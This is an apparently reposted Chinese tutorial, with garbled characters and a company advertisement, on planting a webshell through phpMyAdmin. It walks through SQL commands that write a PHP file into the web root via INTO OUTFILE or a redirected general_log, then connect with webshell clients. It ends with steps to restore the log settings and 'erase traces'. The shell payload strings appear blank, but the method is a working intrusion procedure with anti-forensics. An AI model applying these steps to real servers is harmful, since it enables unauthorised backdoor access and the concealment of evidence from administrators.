本篇文章給大家分享的是有關(guān)phpmyadmin中怎么獲取shell�����,小編覺得挺實(shí)用的,因此分享給大家學(xué)習(xí)��,希望大家閱讀完這篇文章后可以有所收獲����,話不多說����,跟著小編一起來看看吧���。
成都網(wǎng)站建設(shè)哪家好,找創(chuàng)新互聯(lián)��!專注于網(wǎng)頁設(shè)計(jì)����、重慶網(wǎng)站建設(shè)、微信開發(fā)�����、小程序開發(fā)����、集團(tuán)成都企業(yè)網(wǎng)站定制等服務(wù)項(xiàng)目。核心團(tuán)隊(duì)均擁有互聯(lián)網(wǎng)行業(yè)多年經(jīng)驗(yàn)��,服務(wù)眾多知名企業(yè)客戶���;涵蓋的客戶類型包括:花箱等眾多領(lǐng)域�,積累了大量豐富的經(jīng)驗(yàn),同時(shí)也獲得了客戶的一致贊美�!
一、select into outfile直接寫入
1�、利用條件
對(duì)web目錄需要有寫權(quán)限能夠使用單引號(hào)(root)
知道網(wǎng)站絕對(duì)路徑(phpinfo/php探針/通過報(bào)錯(cuò)等)
secure_file_priv沒有具體值
2、查看secure_file_priv值
show global variables like '%secure%';
關(guān)于secure_file_priv配置介紹:
secure_file_priv 是用來限制 load dumpfile�、into outfile、load_file() 函數(shù)在哪個(gè)目錄下?lián)碛猩蟼骰蛘咦x取文件的權(quán)限
當(dāng) secure_file_priv 的值為 NULL ��,表示限制 MySQLd 不允許導(dǎo)入|導(dǎo)出��,此時(shí)無法提權(quán)
當(dāng) secure_file_priv 的值為 /tmp/ �����,表示限制 mysqld 的導(dǎo)入|導(dǎo)出只能發(fā)生在 /tmp/ 目錄下����,此時(shí)也無法提權(quán)
當(dāng) secure_file_priv 的值沒有具體值時(shí),表示不對(duì) mysqld 的導(dǎo)入|導(dǎo)出做限制����,此時(shí)可提權(quán)
我這里的secure_file_priv值為NULL,所以不能夠?qū)牖驅(qū)С?/p>
secure_file_priv這個(gè)值是只讀變量��,只能通過配置文件修改�����。如果管理員沒有配置,那么我們是無法進(jìn)行寫入shell的�����,這里我為了測(cè)試能否寫入修改一下
在MySQL的配置文件my.ini中進(jìn)行配置:
修改后secure_file_priv的值如圖所示:
3�、寫入一句話
select '' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'
這里需要注意的一個(gè)點(diǎn)是路徑需要用"\\"
查看下根目錄
二、利用全局日志寫shell
1��、查看配置
查看mysql的日志狀態(tài)���,默認(rèn)是關(guān)閉的,因?yàn)檫@個(gè)日志的量非常大對(duì)資源是一個(gè)比較大的開銷
SHOW VARIABLES LIKE '%general%'
general_log_file為日志保存的位置
2����、開啟general_log模式
開啟general_log 的作用:開啟它可以記錄用戶輸入的每條命令,會(huì)把其保存在C:\phpStudy\MySQL\data\stu1.log的文件中�,其實(shí)就是我們常說的日志文件利用思路:開啟general_log之后把general_log_file的值修改為該網(wǎng)站默認(rèn)路徑下的某一個(gè)自定義的php文件中,然后通過log日志進(jìn)行寫入一句話木馬���,然后再進(jìn)一步利用
這里注意:在修改log路徑前����,源路徑一定要提前記錄下來,我們獲取shell后還要恢復(fù)原來的路徑
set global general_log = on;
再查看一下日志已經(jīng)開啟�,這時(shí)我們就可以通過全局日志寫shell進(jìn)根目錄
3、修改日志目錄為shell地址
set global general_log_file='C:\\phpStudy\\MySQL\\data\\shell.php';
4���、寫入shell
因?yàn)殚_啟了日志記錄功能�,所執(zhí)行的sql語句都會(huì)被記錄在日志中
select ''
查看下日志�����,發(fā)現(xiàn)sql語句已經(jīng)被記錄到了日志中�����,直接用菜刀或者蟻劍連接即可
5�����、抹除痕跡
set global general_log_file='C:\\phpStudy\\MySQL\\data\\stu1.log';
set global general_log = off;
再使用日志查看命令發(fā)現(xiàn)已經(jīng)恢復(fù)
SHOW VARIABLES LIKE '%general%'
以上就是phpmyadmin中怎么獲取shell�����,小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘9ぷ鲿?huì)見到或用到的����。希望你能通過這篇文章學(xué)到更多知識(shí)�。更多詳情敬請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道���。
網(wǎng)頁題目:phpmyadmin中怎么獲取shell
當(dāng)前鏈接:
http://weahome.cn/article/jhoseg.html
重慶分公司
重慶分公司
